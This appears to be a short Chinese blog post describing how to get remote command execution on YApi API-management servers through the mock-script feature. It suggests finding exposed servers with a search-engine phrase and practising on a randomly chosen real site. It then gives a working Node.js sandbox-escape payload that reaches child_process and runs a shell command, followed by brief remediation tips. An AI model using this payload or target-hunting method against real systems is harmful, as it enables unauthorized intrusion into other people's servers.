Loading... ## 寻找安装了YAPI的服务器 --- 百度搜索关键词为 `YApi-高效、易用、功能强大的可视化接口管理平台`  **<div class="tip inlineBlock info"> 让我们随机选取一名幸运儿练手 </div>** ### **注册YAPI账号**  ## 准备攻击 ### 新建项目   ### 新建接口  ### 点击提交进行提交  ### 利用Mock进行攻击    ```bash const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor('return process') const process = myfun() mockJson = process.mainModule.require("child_process").execSync("whoami").toString() ```   ## 修复建议 1.关闭YAPI注册功能 2.删除恶意账户 3.回滚服务器快照 4.同步删除恶意mock脚本以防止二次攻击 最后修改:2023 年 03 月 26 日 © 允许规范转载 打赏 赞赏作者 支付宝微信 赞 0 如果觉得我的文章对你有用,请随意赞赏
1 条评论
6666